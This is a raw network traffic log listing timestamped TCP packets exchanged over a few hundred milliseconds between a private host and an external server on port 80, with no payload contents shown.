Oct 2, 2024 09:41:24.860565901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860579967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860593081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860593081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860593081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860593081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860593081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860593081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860593081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860606909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860621929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860645056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860657930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860672951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860687017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860699892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860701084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860699892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860699892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860699892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860699892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860699892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860714912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860728979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860743999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860842943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.860899925 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860901117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860901117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860901117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860901117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.860901117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.861032009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861083984 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.861182928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861197948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861432076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.861432076 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.861680984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861695051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861709118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861722946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861737967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861772060 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.861772060 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.861772060 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.861835003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861850023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861861944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861876011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861890078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.861902952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.862019062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.862019062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.862019062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.862019062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.933142900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.933168888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.933183908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.933197975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.933212042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.933226109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.933242083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.933542967 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.933542967 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.933542967 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.933542967 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.940644979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940666914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940680981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940704107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.940715075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940752983 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.940752983 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.940790892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940804958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940819979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940834999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940869093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.940869093 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.940891981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940906048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940941095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940953970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940968037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940982103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.940995932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941028118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941028118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941028118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941028118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941600084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941674948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941688061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941701889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941715956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941746950 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941746950 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941862106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941874981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941895962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941910028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941924095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941945076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941947937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941947937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941947937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941947937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941947937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.941958904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941972971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941987038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.941999912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942013025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942027092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942034960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942034960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942034960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942034960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942034960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942034960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942078114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942091942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942095995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942095995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942152023 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942157030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942171097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942184925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942233086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942245960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942260027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942280054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942280054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942281008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942295074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942308903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942351103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942351103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942351103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942351103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942359924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942373037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942385912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942420959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942420959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942425966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942440033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942518950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942533016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942545891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942569017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942576885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942576885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942576885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942576885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942589998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942600012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942604065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942616940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942635059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942648888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942692041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942706108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942718983 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942718983 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942718983 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942718983 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942739010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942743063 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942743063 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942753077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942785025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942785978 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942796946 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942852020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.942857981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942872047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942886114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942900896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.942914963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.943403959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.943403959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.943403959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.948203087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948287010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948298931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948348999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948360920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948368073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948388100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948400021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948415041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948420048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.948420048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.948420048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.948420048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.948544025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.948544025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.948882103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948894978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.948901892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949013948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949034929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949052095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949057102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949069977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949084044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949085951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949085951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949096918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949110985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949121952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949136019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949140072 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949140072 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949150085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949171066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949184895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949187994 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949187994 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949198008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949212074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949224949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949239016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949290991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949304104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949318886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949331999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949337959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949337959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949337959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949337959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949337959 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949346066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949357033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949359894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949368000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949409008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949423075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949445009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949457884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949470997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949477911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949477911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949477911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949486971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949490070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949502945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949517012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949666023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949678898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949692965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949707031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949721098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.949728966 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949728966 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949729919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949729919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949729919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.949733973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:24.950063944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:24.950063944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.021853924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.021888971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.021907091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.021924019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.021941900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.021959066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.021977901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.021992922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.022022963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.022022963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.022022963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.022022963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.022022963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.022022963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029182911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029210091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029304028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029321909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029349089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029375076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029393911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029411077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029428005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029443979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029454947 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029454947 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029454947 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029454947 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029454947 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029454947 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029478073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029495955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029512882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029532909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029550076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029568911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.029572010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029572010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029572010 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029583931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029583931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029583931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.029616117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031352043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031367064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031393051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031414032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031431913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031431913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031433105 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031450987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031496048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031513929 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031522989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031539917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031557083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031574965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031590939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031608105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031624079 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031624079 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031624079 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031624079 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031624079 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031624079 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031634092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031634092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.031663895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031689882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.031707048 CEST	80	49749	46.8.231.109	192.168.2.4
